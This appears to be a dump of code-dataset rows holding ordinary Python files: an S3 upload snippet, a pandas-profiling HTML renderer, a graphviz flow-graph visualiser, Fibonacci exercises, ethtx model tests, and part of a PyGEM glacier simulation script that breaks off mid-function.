config.read('config.ini')
ACCESS_KEY = config['AWS']['ACCESS_KEY']
SECRET_KEY = config['AWS']['SECRET_KEY']
"""
File related constants
"""
# Upload the scraped CSV to S3; expected failures are logged, not raised.
s3 = boto3.client('s3', aws_access_key_id=ACCESS_KEY, aws_secret_access_key=SECRET_KEY)
try:
    s3.upload_file(FILE_NAME, 'weather-scrape-bucket', S3_FILE_KEY)
    sc_log.log(logging.DEBUG, "Completed S3 upload.")
except FileNotFoundError:
    sc_log.exception("The file was not found.")
except NoCredentialsError:
    sc_log.exception("There is an issue with the credentials.")
| 0 | 0 | 0 |
6b3a348a4ea5ce822a4219b204beebee38d50090 | 363 | py | Python | src/pandas_profiling/report/presentation/core/html.py | abhicantdraw/pandas-profiling | a12ebb7a94b9371df94bf611237a389d99f8bc00 | [
"MIT"
] | 8,107 | 2018-01-07T23:27:39.000Z | 2022-02-22T12:57:11.000Z | src/pandas_profiling/report/presentation/core/html.py | abhicantdraw/pandas-profiling | a12ebb7a94b9371df94bf611237a389d99f8bc00 | [
"MIT"
] | 771 | 2018-01-06T11:33:08.000Z | 2022-02-21T11:16:02.000Z | src/pandas_profiling/report/presentation/core/html.py | abhicantdraw/pandas-profiling | a12ebb7a94b9371df94bf611237a389d99f8bc00 | [
"MIT"
] | 1,308 | 2018-01-08T21:22:08.000Z | 2022-02-21T04:10:21.000Z | from typing import Any
from pandas_profiling.report.presentation.core.item_renderer import ItemRenderer
| 24.2 | 80 | 0.677686 | from typing import Any
from pandas_profiling.report.presentation.core.item_renderer import ItemRenderer
class HTML(ItemRenderer):
    """Leaf renderer item that carries a raw HTML snippet verbatim."""

    def __init__(self, content: str, **kwargs):
        payload = {"html": content}
        super().__init__("html", payload, **kwargs)

    def __repr__(self) -> str:
        return "HTML"

    def render(self) -> Any:
        # Concrete rendering is supplied by flavour-specific subclasses.
        raise NotImplementedError()
| 150 | 4 | 103 |
ad8010831a49578bee5bd4cb162c4edd05b5f6a3 | 3,679 | py | Python | pyflowgraph/visual.py | stspbu/code-change-miner | a9aceb92a3484f0c3c8140bbb986bfec1e2d7562 | [
"Apache-2.0"
] | 1 | 2020-09-06T16:32:17.000Z | 2020-09-06T16:32:17.000Z | pyflowgraph/visual.py | neomatrix369/code-change-miner | 4fe24d03c8512202bc80a77bf1ebee456d8400d7 | [
"Apache-2.0"
] | null | null | null | pyflowgraph/visual.py | neomatrix369/code-change-miner | 4fe24d03c8512202bc80a77bf1ebee456d8400d7 | [
"Apache-2.0"
] | null | null | null | import graphviz as gv
import os
from pyflowgraph.models import ExtControlFlowGraph, DataNode, OperationNode, ControlNode, ControlEdge, DataEdge, EntryNode
| 41.337079 | 122 | 0.643653 | import graphviz as gv
import os
from pyflowgraph.models import ExtControlFlowGraph, DataNode, OperationNode, ControlNode, ControlEdge, DataEdge, EntryNode
def _get_label_and_attrs(node, show_op_kind=True, show_data_keys=False):
    """Return the display label and graphviz attributes for *node*.

    Data nodes render as ellipses (optionally with their key and kind),
    operation nodes as boxes (optionally with their kind), and control
    nodes as diamonds tagged with their statement number.
    """
    parts = [f'{node.label}']
    attrs = {}
    # Branch order mirrors the original (node families may overlap via subclassing).
    if isinstance(node, DataNode):
        attrs['shape'] = 'ellipse'
        if show_data_keys:
            parts.append(f'#{node.key}')
        if show_op_kind:
            parts.append(f'<{node.kind}>')
    elif isinstance(node, OperationNode):
        attrs['shape'] = 'box'
        if show_op_kind:
            parts.append(f'<{node.kind}>')
    elif isinstance(node, ControlNode):
        attrs['shape'] = 'diamond'
        parts.append(f'[{node.statement_num}]')
    return ' '.join(parts), attrs
def _convert_to_visual_graph(graph: ExtControlFlowGraph, file_name: str,
                             show_op_kinds=True, show_data_keys=False, show_control_branch=False,
                             separate_mapped=True, show_entry_node=True,
                             min_statement_num=None, max_statement_num=None):
    """Build a graphviz Digraph mirroring *graph*.

    Nodes whose statement_num falls outside [min_statement_num,
    max_statement_num] (and, optionally, entry nodes) are skipped.  When
    separate_mapped is True, a node and its `mapped` counterpart are emitted
    together inside a rank-constrained subgraph so the pair is aligned.
    Control edges may be prefixed with their T/F branch kind; data edges are
    drawn dotted.  Node identifiers are statement numbers.
    """
    vg = gv.Digraph(name=file_name, format='pdf')
    # Tracks nodes already emitted as one half of a mapped pair so the node
    # pass does not render them a second time.
    used = {}
    # --- node pass ---
    for node in graph.nodes:
        if isinstance(node, EntryNode) and not show_entry_node \
                or min_statement_num is not None and node.statement_num < min_statement_num \
                or max_statement_num is not None and node.statement_num > max_statement_num:
            continue
        if used.get(node):
            continue
        if separate_mapped and node.mapped:
            label, attrs = _get_label_and_attrs(node, show_op_kind=show_op_kinds, show_data_keys=show_data_keys)
            mapped_label, mapped_attrs = _get_label_and_attrs(
                node.mapped, show_op_kind=show_op_kinds, show_data_keys=show_data_keys)
            used[node] = used[node.mapped] = True
            s = gv.Digraph(f'subgraph: {node.statement_num} to {node.mapped.statement_num}')
            s.node(f'{node.statement_num}', label=label, _attributes=attrs)
            s.node(f'{node.mapped.statement_num}', label=mapped_label, _attributes=mapped_attrs)
            # Entry nodes anchor at the top of the layout; other mapped pairs
            # share a rank so they appear side by side.
            rank = 'source' if isinstance(node, EntryNode) else 'same'
            s.graph_attr.update(rank=rank)
            vg.subgraph(s)
        else:
            label, attrs = _get_label_and_attrs(node, show_op_kind=show_op_kinds, show_data_keys=show_data_keys)
            vg.node(f'{node.statement_num}', label=label, _attributes=attrs)
    # --- edge pass (filtered by the same source-node criteria) ---
    for node in graph.nodes:
        for edge in node.in_edges:
            if isinstance(edge.node_from, EntryNode) and not show_entry_node \
                    or min_statement_num is not None and edge.node_from.statement_num < min_statement_num \
                    or max_statement_num is not None and edge.node_from.statement_num > max_statement_num:
                continue
            label = edge.label
            attrs = {}
            if show_control_branch and isinstance(edge, ControlEdge):
                label = f'{"T" if edge.branch_kind else "F"} {label}'
            if isinstance(edge, DataEdge):
                attrs['style'] = 'dotted'
            vg.edge(str(edge.node_from.statement_num), str(edge.node_to.statement_num), xlabel=label, _attributes=attrs)
    return vg
def export_graph_image(graph: ExtControlFlowGraph, path: str = 'pfg.dot', show_op_kinds=True, show_data_keys=False):
    """Render *graph* as a Graphviz document rooted at *path* (PDF output).

    Only the base name is used for the internal graph name; graphviz derives
    the output location from the full *path* passed to render().  The unused
    `directory` local from the original tuple-unpack has been removed.
    """
    file_name = os.path.basename(path)
    visual_graph = _convert_to_visual_graph(graph, file_name, show_control_branch=True,
                                            show_op_kinds=show_op_kinds, show_data_keys=show_data_keys)
    visual_graph.render(path)
| 3,451 | 0 | 69 |
b484bf03eff33ef8a88973fb7e0988e315bc3613 | 591 | py | Python | learning/01-pattern/00-recursion-backtracking/07-fibonacci.py | tienduy-nguyen/ds-algorithms | 5c211393f19a97215beb061ed826362fadf83326 | [
"MIT"
] | null | null | null | learning/01-pattern/00-recursion-backtracking/07-fibonacci.py | tienduy-nguyen/ds-algorithms | 5c211393f19a97215beb061ed826362fadf83326 | [
"MIT"
] | null | null | null | learning/01-pattern/00-recursion-backtracking/07-fibonacci.py | tienduy-nguyen/ds-algorithms | 5c211393f19a97215beb061ed826362fadf83326 | [
"MIT"
] | null | null | null |
# not good
# Dynamic programming
def factorial(n):
    """Return n! computed recursively; factorial(0) == 1."""
    return 1 if n == 0 else n * factorial(n - 1)
# not good: naive recursion recomputes subproblems in exponential time
def fibonacci_recursion(n):
    """Naive exponential-time recursive Fibonacci; returns n itself for n < 2."""
    if n >= 2:
        return fibonacci_recursion(n - 2) + fibonacci_recursion(n - 1)
    return n
def fibonacci(n):
    """Return the n-th Fibonacci number using a bottom-up table.

    Bug fix: the original assigned ``fib[i] = ...`` on a length-2 list,
    which raised IndexError for every n >= 2; the table is now grown with
    append so each entry exists before it is read.
    """
    if n <= 1:
        return n
    fib = [0, 1]
    for i in range(2, n + 1):
        fib.append(fib[i - 1] + fib[i - 2])
    return fib[n]
# Dynamic programming (bottom-up)
def fibonacci_dp(n):
    """Return the n-th Fibonacci number in O(n) time and O(1) space."""
    if n <= 1:
        return n
    prev, curr = 0, 1
    # Advance the (F(k-1), F(k)) pair n-1 times, ending with curr == F(n).
    for _ in range(n - 1):
        prev, curr = curr, prev + curr
    return curr
| 465 | 0 | 89 |
7ac1fd31606dbc3b5b90d1efc4ed050693153622 | 1,803 | py | Python | tests/test_model.py | daifoundation/ethtx_ce | 5aa0de0e33f6af569e840554b024116c9a21d54b | [
"Apache-2.0"
] | 1 | 2021-07-26T11:05:24.000Z | 2021-07-26T11:05:24.000Z | tests/test_model.py | daifoundation/ethtx_ce | 5aa0de0e33f6af569e840554b024116c9a21d54b | [
"Apache-2.0"
] | null | null | null | tests/test_model.py | daifoundation/ethtx_ce | 5aa0de0e33f6af569e840554b024116c9a21d54b | [
"Apache-2.0"
] | 1 | 2021-07-26T11:05:32.000Z | 2021-07-26T11:05:32.000Z | from datetime import datetime
from ethtx_ce.config import EthConfig
from ethtx_ce.backend.models.objects_model import Block, Event, Transaction
from mocks.mocks import MockWeb3Provider
| 37.5625 | 86 | 0.716583 | from datetime import datetime
from ethtx_ce.config import EthConfig
from ethtx_ce.backend.models.objects_model import Block, Event, Transaction
from mocks.mocks import MockWeb3Provider
class TestModel:
    """Smoke tests: model objects built from a mocked web3 provider expose their core fields."""

    def test_create_transaction(self):
        """A Transaction constructed from a tx hash has its basic fields populated."""
        provider = MockWeb3Provider()
        tx = Transaction("0xd7701a0fc05593aee3a16f20cab605db7183f752ae942cc75fd0975feaf1072e",
                         web3provider=provider)
        assert tx is not None
        self._assert_tx_fields(tx)

    def test_create_block(self):
        """A Block constructed from a block number has its basic fields populated."""
        block = Block(1, web3provider=MockWeb3Provider())
        assert block is not None
        self._assert_block_fields(block)

    def test_create_event_from_tx_hash(self):
        """An Event built from a receipt log carries chain, tx, time, and index data."""
        tx = "0xd7701a0fc05593aee3a16f20cab605db7183f752ae942cc75fd0975feaf1072e"
        receipt = MockWeb3Provider().get_transaction_receipt(tx)
        event = Event(EthConfig.DEFAULT_CHAIN, tx, datetime.now(), receipt.logs[0])
        assert event is not None
        assert event.chain_id is not None
        assert event.tx_hash is not None
        assert event.timestamp is not None
        assert event.log_index is not None

    def _assert_block_fields(self, block: Block):
        # Internal helper: every core Block attribute must be set.
        assert block is not None
        for value in (block.block_number, block.block_hash, block.timestamp,
                      block.miner, block.tx_count):
            assert value is not None

    def _assert_tx_fields(self, tx: Transaction):
        # Internal helper: every core Transaction attribute must be set.
        for value in (tx.tx_hash, tx.from_address, tx.to_address,
                      tx.timestamp, tx.tx_index):
            assert value is not None
| 1,464 | -5 | 157 |
e7f77c402f926f2c0f88139332f635d977b294bd | 65,367 | py | Python | run_simulation_woggm.py | Wang518hongyu/PyGEMwangtest | f6ff507681b45599d0ecce5be2e5292e94fd09f7 | [
"MIT"
] | null | null | null | run_simulation_woggm.py | Wang518hongyu/PyGEMwangtest | f6ff507681b45599d0ecce5be2e5292e94fd09f7 | [
"MIT"
] | null | null | null | run_simulation_woggm.py | Wang518hongyu/PyGEMwangtest | f6ff507681b45599d0ecce5be2e5292e94fd09f7 | [
"MIT"
] | null | null | null | """Run a model simulation."""
# Default climate data is ERA-Interim; specify CMIP5 by specifying a filename to the argument:
# (Command line) python run_simulation_list_multiprocess.py -gcm_list_fn=C:\...\gcm_rcpXX_filenames.txt
# - Default is running ERA-Interim in parallel with five processors.
# (Spyder) %run run_simulation_list_multiprocess.py C:\...\gcm_rcpXX_filenames.txt -option_parallels=0
# - Spyder cannot run parallels, so always set -option_parallels=0 when testing in Spyder.
# Spyder cannot run parallels, so always set -option_parallels=0 when testing in Spyder.
# Built-in libraries
import argparse
import collections
import inspect
import multiprocessing
import os
import time
# External libraries
import pandas as pd
import pickle
import numpy as np
import xarray as xr
# Local libraries
import class_climate
import class_mbdata
import pygem_input as input
import pygemfxns_gcmbiasadj as gcmbiasadj
import pygemfxns_massbalance as massbalance
import pygemfxns_modelsetup as modelsetup
import spc_split_glaciers as split_glaciers
#%% FUNCTIONS
def getparser():
    """
    Use argparse to add arguments from the command line

    Parameters
    ----------
    gcm_list_fn (optional) : str
        text file that contains the climate data to be used in the model simulation
    gcm_name (optional) : str
        gcm name
    rcp (optional) : str
        representative concentration pathway (ex. 'rcp26')
    num_simultaneous_processes (optional) : int
        number of cores to use in parallels
    option_parallels (optional) : int
        switch to use parallels or not
    rgi_glac_number_fn (optional) : str
        filename of .pkl file containing a list of glacier numbers that used to run batches on the supercomputer
    batch_number (optional): int
        batch number used to differentiate output on supercomputer
    option_ordered : int
        option to keep glaciers ordered or to grab every n value for the batch
        (the latter helps make sure run times on each core are similar as it removes any timing differences caused by
        regional variations)
    debug (optional) : int
        Switch for turning debug printing on or off (default = 0 (off))
    debug_spc (optional) : int
        Switch for turning debug printing of spc on or off (default = 0 (off))

    Returns
    -------
    Object containing arguments and their respective values.
    """
    parser = argparse.ArgumentParser(description="run simulations from gcm list in parallel")
    # add arguments
    parser.add_argument('-gcm_list_fn', action='store', type=str, default=input.ref_gcm_name,
                        help='text file full of commands to run')
    parser.add_argument('-gcm_name', action='store', type=str, default=None,
                        help='GCM name used for model run')
    parser.add_argument('-rcp', action='store', type=str, default=None,
                        help='rcp scenario used for model run (ex. rcp26)')
    parser.add_argument('-num_simultaneous_processes', action='store', type=int, default=4,
                        help='number of simultaneous processes (cores) to use')
    parser.add_argument('-option_parallels', action='store', type=int, default=1,
                        help='Switch to use or not use parallels (1 - use parallels, 0 - do not)')
    parser.add_argument('-rgi_glac_number_fn', action='store', type=str, default=None,
                        help='Filename containing list of rgi_glac_number, helpful for running batches on spc')
    parser.add_argument('-batch_number', action='store', type=int, default=None,
                        help='Batch number used to differentiate output on supercomputer')
    parser.add_argument('-option_ordered', action='store', type=int, default=1,
                        help='switch to keep lists ordered or not')
    # Fix: the two help strings below were missing their closing parenthesis.
    parser.add_argument('-debug', action='store', type=int, default=0,
                        help='Boolean for debugging to turn it on or off (default 0 is off)')
    parser.add_argument('-debug_spc', action='store', type=int, default=0,
                        help='Boolean for debugging to turn it on or off (default 0 is off)')
    return parser
def calc_stats_array(data, stats_cns=None):
    """
    Calculate statistics across the simulation axis (axis=1) of a variable.

    Parameters
    ----------
    data : np.array
        2-D array of values with one column per simulation
    stats_cns : list of str, optional
        statistics to compute; defaults to input.sim_stat_cns (resolved at
        call time so the module-level default can be changed after import)

    Returns
    -------
    stats : np.array
        2-D array with one column per requested statistic, in the fixed
        canonical order: mean, std, 2.5%, 25%, median, 75%, 97.5%

    Raises
    ------
    ValueError
        if stats_cns contains none of the recognized statistic names

    Notes
    -----
    Bug fix: the original only initialized the output inside the 'mean'
    branch, so any stats_cns without 'mean' raised NameError.
    """
    if stats_cns is None:
        stats_cns = input.sim_stat_cns
    # (name, function) pairs in the canonical column order used downstream.
    stat_calcs = [
        ('mean', lambda d: d.mean(axis=1)),
        ('std', lambda d: d.std(axis=1)),
        ('2.5%', lambda d: np.percentile(d, 2.5, axis=1)),
        ('25%', lambda d: np.percentile(d, 25, axis=1)),
        ('median', lambda d: np.median(d, axis=1)),
        ('75%', lambda d: np.percentile(d, 75, axis=1)),
        ('97.5%', lambda d: np.percentile(d, 97.5, axis=1)),
    ]
    columns = [calc(data)[:, np.newaxis] for cn, calc in stat_calcs if cn in stats_cns]
    if not columns:
        raise ValueError('stats_cns contains no recognized statistics: ' + str(stats_cns))
    return np.concatenate(columns, axis=1)
def create_xrdataset(main_glac_rgi, dates_table, sim_iters=input.sim_iters, stat_cns=input.sim_stat_cns,
                     record_stats=0, option_wateryear=input.gcm_wateryear):
    """
    Create empty xarray dataset that will be used to record simulation runs.

    Parameters
    ----------
    main_glac_rgi : pandas dataframe
        dataframe containing relevant rgi glacier information
    dates_table : pandas dataframe
        table of the dates, months, days in month, etc.
    sim_iters : int
        number of simulation runs included
    stat_cns : list
        list of strings containing statistics that will be used on simulations
    record_stats : int
        Switch to change from recording simulations to statistics
    Returns
    -------
    output_ds_all : xarray Dataset
        empty xarray dataset that contains variables and attributes to be filled in by simulation runs
    encoding : dictionary
        encoding used with exporting xarray dataset to netcdf
    """
    # NOTE(review): only output_package == 2 is implemented; any other value
    # leaves output_ds_all/encoding undefined and the final return raises
    # NameError -- confirm callers always run with package 2.
    if input.output_package == 2:
        # Create empty datasets for each variable and merge them
        # Coordinate values
        output_variables = input.output_variables_package2
        glac_values = main_glac_rgi.index.values
        annual_columns = np.unique(dates_table['wateryear'].values)[0:int(dates_table.shape[0]/12)]
        time_values = dates_table.loc[input.spinupyears*12:dates_table.shape[0]+1,'date'].tolist()
        year_values = annual_columns[input.spinupyears:annual_columns.shape[0]]
        year_plus1_values = np.concatenate((annual_columns[input.spinupyears:annual_columns.shape[0]],
                                            np.array([annual_columns[annual_columns.shape[0]-1]+1])))
        # Year type for attributes
        if option_wateryear == 1:
            year_type = 'water year'
        elif option_wateryear == 2:
            year_type = 'calendar year'
        else:
            year_type = 'custom year'
        # Switch to record simulations or statistics
        if record_stats == 0:
            record_name = 'sim'
            record_name_values = np.arange(0,sim_iters)
        elif record_stats == 1:
            record_name = 'stats'
            record_name_values = input.sim_stat_cns
        # Variable coordinates dictionary
        output_coords_dict = {
                'prec_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'temp_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'acc_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'refreeze_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'melt_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'frontalablation_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'massbaltotal_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'runoff_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'snowline_glac_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'area_glac_annual': collections.OrderedDict(
                        [('glac', glac_values), ('year_plus1', year_plus1_values), (record_name, record_name_values)]),
                'volume_glac_annual': collections.OrderedDict(
                        [('glac', glac_values), ('year_plus1', year_plus1_values), (record_name, record_name_values)]),
                'ELA_glac_annual': collections.OrderedDict(
                        [('glac', glac_values), ('year', year_values), (record_name, record_name_values)]),
                'offglac_prec_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'offglac_refreeze_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'offglac_melt_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'offglac_snowpack_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                'offglac_runoff_monthly': collections.OrderedDict(
                        [('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
                }
        # Attributes dictionary
        output_attrs_dict = {
                'time': {
                        'long_name': 'date',
                        'year_type':year_type},
                'glac': {
                        'long_name': 'glacier index',
                        'comment': 'glacier index value that refers to the glacier table'},
                'year': {
                        'long_name': 'years',
                        'year_type': year_type,
                        'comment': 'years referring to the start of each year'},
                'year_plus1': {
                        'long_name': 'years plus one additional year',
                        'year_type': year_type,
                        'comment': ('additional year allows one to record glacier dimension changes at end of '
                                    'model run')},
                'sim': {
                        'long_name': 'simulation number',
                        'comment': 'simulation numbers only needed for MCMC methods'},
                'stats': {
                        'long_name': 'variable statistics',
                        'comment': '% refers to percentiles'},
                'temp_glac_monthly': {
                        'long_name': 'glacier-wide mean air temperature',
                        'units': 'degC',
                        'temporal_resolution': 'monthly',
                        'comment': (
                                'each elevation bin is weighted equally to compute the mean temperature, and '
                                'bins where the glacier no longer exists due to retreat have been removed')},
                'prec_glac_monthly': {
                        'long_name': 'glacier-wide precipitation (liquid)',
                        'units': 'm',
                        'temporal_resolution': 'monthly',
                        'comment': 'only the liquid precipitation, solid precipitation excluded'},
                'acc_glac_monthly': {
                        'long_name': 'glacier-wide accumulation',
                        'units': 'm w.e.',
                        'temporal_resolution': 'monthly',
                        'comment': 'only the solid precipitation'},
                'refreeze_glac_monthly': {
                        'long_name': 'glacier-wide refreeze',
                        'units': 'm w.e.',
                        'temporal_resolution': 'monthly'},
                'melt_glac_monthly': {
                        'long_name': 'glacier-wide melt',
                        'units': 'm w.e.',
                        'temporal_resolution': 'monthly'},
                'frontalablation_glac_monthly': {
                        'long_name': 'glacier-wide frontal ablation',
                        'units': 'm w.e.',
                        'temporal_resolution': 'monthly',
                        'comment': (
                                'mass losses from calving, subaerial frontal melting, sublimation above the '
                                'waterline and subaqueous frontal melting below the waterline')},
                'massbaltotal_glac_monthly': {
                        'long_name': 'glacier-wide total mass balance',
                        'units': 'm w.e.',
                        'temporal_resolution': 'monthly',
                        'comment': (
                                'total mass balance is the sum of the climatic mass balance and frontal '
                                'ablation')},
                'runoff_glac_monthly': {
                        'long_name': 'glacier-wide runoff',
                        'units': 'm**3',
                        'temporal_resolution': 'monthly',
                        'comment': 'runoff from the glacier terminus, which moves over time'},
                'snowline_glac_monthly': {
                        'long_name': 'transient snowline',
                        'units': 'm a.s.l.',
                        'temporal_resolution': 'monthly',
                        'comment': 'transient snowline is altitude separating snow from ice/firn'},
                'area_glac_annual': {
                        'long_name': 'glacier area',
                        'units': 'km**2',
                        'temporal_resolution': 'annual',
                        'comment': 'area used for the duration of the defined start/end of year'},
                'volume_glac_annual': {
                        'long_name': 'glacier volume',
                        'units': 'km**3 ice',
                        'temporal_resolution': 'annual',
                        'comment': 'volume based on area and ice thickness used for that year'},
                'ELA_glac_annual': {
                        'long_name': 'annual equilibrium line altitude',
                        'units': 'm a.s.l.',
                        'temporal_resolution': 'annual',
                        'comment': (
                                'equilibrium line altitude is the elevation where the climatic mass balance is '
                                'zero')},
                'offglac_prec_monthly': {
                        'long_name': 'off-glacier-wide precipitation (liquid)',
                        'units': 'm',
                        'temporal_resolution': 'monthly',
                        'comment': 'only the liquid precipitation, solid precipitation excluded'},
                'offglac_refreeze_monthly': {
                        'long_name': 'off-glacier-wide refreeze',
                        'units': 'm w.e.',
                        'temporal_resolution': 'monthly'},
                'offglac_melt_monthly': {
                        'long_name': 'off-glacier-wide melt',
                        'units': 'm w.e.',
                        'temporal_resolution': 'monthly',
                        'comment': 'only melt of snow and refreeze since off-glacier'},
                'offglac_runoff_monthly': {
                        'long_name': 'off-glacier-wide runoff',
                        'units': 'm**3',
                        'temporal_resolution': 'monthly',
                        'comment': 'off-glacier runoff from area where glacier no longer exists'},
                'offglac_snowpack_monthly': {
                        'long_name': 'off-glacier-wide snowpack',
                        'units': 'm w.e.',
                        'temporal_resolution': 'monthly',
                        'comment': 'snow remaining accounting for new accumulation, melt, and refreeze'},
                }
        # Add variables to empty dataset and merge together
        count_vn = 0
        encoding = {}
        noencoding_vn = ['stats', 'glac_attrs']
        for vn in output_variables:
            count_vn += 1
            empty_holder = np.zeros([len(output_coords_dict[vn][i]) for i in list(output_coords_dict[vn].keys())])
            output_ds = xr.Dataset({vn: (list(output_coords_dict[vn].keys()), empty_holder)},
                                   coords=output_coords_dict[vn])
            # Merge datasets of stats into one output
            if count_vn == 1:
                output_ds_all = output_ds
            else:
                output_ds_all = xr.merge((output_ds_all, output_ds))
        # Add a glacier table so that the glaciers attributes accompany the netcdf file
        main_glac_rgi_float = main_glac_rgi[input.output_glacier_attr_vns].copy()
        main_glac_rgi_xr = xr.Dataset({'glacier_table': (('glac', 'glac_attrs'), main_glac_rgi_float.values)},
                                      coords={'glac': glac_values,
                                              'glac_attrs': main_glac_rgi_float.columns.values})
        output_ds_all = output_ds_all.combine_first(main_glac_rgi_xr)
        output_ds_all.glacier_table.attrs['long_name'] = 'RGI glacier table'
        output_ds_all.glacier_table.attrs['comment'] = 'table contains attributes from RGI for each glacier'
        output_ds_all.glac_attrs.attrs['long_name'] = 'RGI glacier attributes'
        # Add attributes
        for vn in output_ds_all.variables:
            try:
                output_ds_all[vn].attrs = output_attrs_dict[vn]
            # Bug fix: narrowed from a bare `except:` -- the only expected
            # failure is a variable with no entry in output_attrs_dict;
            # anything else should surface rather than be silenced.
            except KeyError:
                pass
            # Encoding (specify _FillValue, offsets, etc.)
            if vn not in noencoding_vn:
                encoding[vn] = {'_FillValue': False}
    return output_ds_all, encoding
def convert_glacwide_results(elev_bins, glac_bin_temp, glac_bin_prec, glac_bin_acc, glac_bin_refreeze,
                             glac_bin_snowpack, glac_bin_melt, glac_bin_frontalablation, glac_bin_massbalclim_annual,
                             glac_bin_area_annual, glac_bin_icethickness_annual):
    """
    Convert raw runmassbalance function output to glacier-wide results for output package 2

    (A block of commented-out "DELETE ME" debug code from the original has
    been removed; the computation is unchanged.)

    Parameters
    ----------
    elev_bins : numpy array
        elevation of each elevation bin
    glac_bin_temp : numpy array
        temperature for each elevation bin for each timestep
    glac_bin_prec : numpy array
        precipitation (liquid) for each elevation bin for each timestep
    glac_bin_acc : numpy array
        accumulation (solid precipitation) for each elevation bin for each timestep
    glac_bin_refreeze : numpy array
        refreeze for each elevation bin for each timestep
    glac_bin_snowpack : numpy array
        snowpack for each elevation bin for each timestep
    glac_bin_melt : numpy array
        glacier melt for each elevation bin for each timestep
    glac_bin_frontalablation : numpy array
        frontal ablation for each elevation bin for each timestep
    glac_bin_massbalclim_annual : numpy array
        annual climatic mass balance for each elevation bin for each timestep
    glac_bin_area_annual : numpy array
        annual glacier area for each elevation bin for each timestep
    glac_bin_icethickness_annual: numpy array
        annual ice thickness for each elevation bin for each timestep

    Returns
    -------
    glac_wide_temp : np.array
        monthly mean glacier-wide temperature (bins weighted equally)
    glac_wide_prec : np.array
        monthly glacier-wide precipitation (liquid only)
    glac_wide_acc : np.array
        monthly glacier-wide accumulation (solid precipitation only)
    glac_wide_refreeze : np.array
        monthly glacier-wide refreeze
    glac_wide_melt : np.array
        monthly glacier-wide melt
    glac_wide_frontalablation : np.array
        monthly glacier-wide frontal ablation
    glac_wide_massbaltotal : np.array
        monthly glacier-wide total mass balance (climatic mass balance + frontal ablation)
    glac_wide_runoff: np.array
        monthly glacier-wide runoff at the terminus of the glacier
    glac_wide_snowline : np.array
        monthly glacier-wide snowline
    glac_wide_area_annual : np.array
        annual glacier area
    glac_wide_volume_annual : np.array
        annual glacier volume
    glac_wide_ELA_annual : np.array
        annual equilibrium line altitude
    """
    # Preset desired output (needed to avoid dividing by zero)
    glac_wide_temp = np.zeros(glac_bin_temp.shape[1])
    glac_wide_prec = np.zeros(glac_bin_temp.shape[1])
    glac_wide_acc = np.zeros(glac_bin_temp.shape[1])
    glac_wide_refreeze = np.zeros(glac_bin_temp.shape[1])
    glac_wide_melt = np.zeros(glac_bin_temp.shape[1])
    glac_wide_frontalablation = np.zeros(glac_bin_temp.shape[1])
    # Compute desired output
    # Drop the extra end-of-run year, then repeat each annual area for its 12 months
    glac_bin_area = glac_bin_area_annual[:,0:glac_bin_area_annual.shape[1]-1].repeat(12,axis=1)
    glac_wide_area = glac_bin_area.sum(axis=0)
    # Temperature is an unweighted mean over bins with a nonzero value
    glac_wide_temp_sum = glac_bin_temp.sum(axis=0)
    glac_bin_temp_nonzero = np.zeros(glac_bin_temp.shape)
    glac_bin_temp_nonzero[glac_bin_temp != 0] = 1
    glac_wide_temp_bincount = glac_bin_temp_nonzero.sum(axis=0)
    glac_wide_temp[glac_wide_temp_bincount > 0] = (glac_wide_temp_sum[glac_wide_temp_bincount > 0] /
                                                   glac_wide_temp_bincount[glac_wide_temp_bincount > 0])
    # Fluxes are area-weighted means (m * km**2 summed, then divided by area)
    glac_wide_prec_mkm2 = (glac_bin_prec * glac_bin_area).sum(axis=0)
    glac_wide_prec[glac_wide_prec_mkm2 > 0] = (glac_wide_prec_mkm2[glac_wide_prec_mkm2 > 0] /
                                               glac_wide_area[glac_wide_prec_mkm2 > 0])
    glac_wide_acc_mkm2 = (glac_bin_acc * glac_bin_area).sum(axis=0)
    glac_wide_acc[glac_wide_acc_mkm2 > 0] = (glac_wide_acc_mkm2[glac_wide_acc_mkm2 > 0] /
                                             glac_wide_area[glac_wide_acc_mkm2 > 0])
    glac_wide_refreeze_mkm2 = (glac_bin_refreeze * glac_bin_area).sum(axis=0)
    glac_wide_refreeze[glac_wide_refreeze_mkm2 > 0] = (glac_wide_refreeze_mkm2[glac_wide_refreeze_mkm2 > 0] /
                                                       glac_wide_area[glac_wide_refreeze_mkm2 > 0])
    glac_wide_melt_mkm2 = (glac_bin_melt * glac_bin_area).sum(axis=0)
    glac_wide_melt[glac_wide_melt_mkm2 > 0] = (glac_wide_melt_mkm2[glac_wide_melt_mkm2 > 0] /
                                               glac_wide_area[glac_wide_melt_mkm2 > 0])
    glac_wide_frontalablation_mkm2 = (glac_bin_frontalablation * glac_bin_area).sum(axis=0)
    glac_wide_frontalablation[glac_wide_frontalablation_mkm2 > 0] = (
            glac_wide_frontalablation_mkm2[glac_wide_frontalablation_mkm2 > 0] /
            glac_wide_area[glac_wide_frontalablation_mkm2 > 0])
    glac_wide_massbalclim = glac_wide_acc + glac_wide_refreeze - glac_wide_melt
    glac_wide_massbaltotal = glac_wide_massbalclim - glac_wide_frontalablation
    glac_wide_runoff = (glac_wide_prec + glac_wide_melt - glac_wide_refreeze) * glac_wide_area * (1000)**2
    # units: (m + m w.e. - m w.e.) * km**2 * (1000 m / 1 km)**2 = m**3
    # Snowline: first bin (from the bottom) with snowpack, shifted to the bin edge
